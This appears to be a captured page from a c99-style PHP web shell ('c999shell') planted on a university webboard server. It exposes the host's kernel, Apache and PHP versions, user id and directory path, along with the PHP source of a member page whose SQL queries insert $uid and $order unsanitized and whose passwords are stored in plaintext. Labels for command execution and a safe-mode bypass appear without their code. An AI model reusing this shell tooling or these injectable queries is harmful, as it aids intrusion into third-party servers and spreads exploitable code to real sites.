Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/webboard/ drwxr-xr-x |
Viewing file: Select action/file-type: <? require("config.inc.php"); ?> <html> <head> <title>Biotechnology Of Assumption University #39</title> </head> <link href="./style.css" rel="stylesheet" type="text/css"> <body bgcolor=#FFFFE0 background="img/bg2.gif"> <font size=2 face="Arial,MS Sans Serif"> </font> <center> <font size=3 color=#9400D3><b>สมาชิกเว็บบอร์ด</b></font> <br> <br> <? // ตรวจสอบว่ามี username หรือไม่ mysql_connect($host,$user,$passwd); $sql = "select * from webboard_member where User='$uid'"; $result = mysql_db_query($dbname,$sql); $NRow = mysql_num_rows($result); if($NRow==0) { echo "Error : Username and Password","กรุณาตรวจสอบอีกครั้ง",""; echo "<br><br><br><br><br><br><br><br><br>\n"; exit(); } $row = mysql_fetch_array($result); $User = $row["User"]; $Password = $row["Password"]; $Email = $row["Email"]; $ICQ = $row["ICQ"]; $WebName = $row["WebName"]; $URL = $row["URL"]; $Profile = $row["Profile"]; // ตรวจสอบการ login if($action=="login") { if($uid!=$User || $pwd!=$Password) { err_msg("Error : Username and Password","กรุณาตรวจสอบอีกครั้ง",""); } } else { echo "Error : Method","กรุณา Login ก่อนเข้าระบบ","login.php"; } ?> <? $db = mysql_connect($host,$user,$passwd) or die ("ไม่สามารถติดต่อ database ได้ในขณะนี้"); $topten="select * from webboard_member order by id $order "; $result = mysql_db_query($dbname,$topten) or die ("ไม่สามารถสั่งให้ database ทำงานได้ในขณะนี้"); $NRow = mysql_num_rows($result); if ($NRow==0) { echo "ยังไม่มีสมาชิก"; } while( $arr = mysql_fetch_row( $result ) ) { print "<BR><font size=2 face=MS Sans Serif>$arr[0]. <a href='$arr[6]' target=_blank> $arr[1] </a> :email : $arr[3] : <br> "; }; mysql_close( $db ); ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]-- |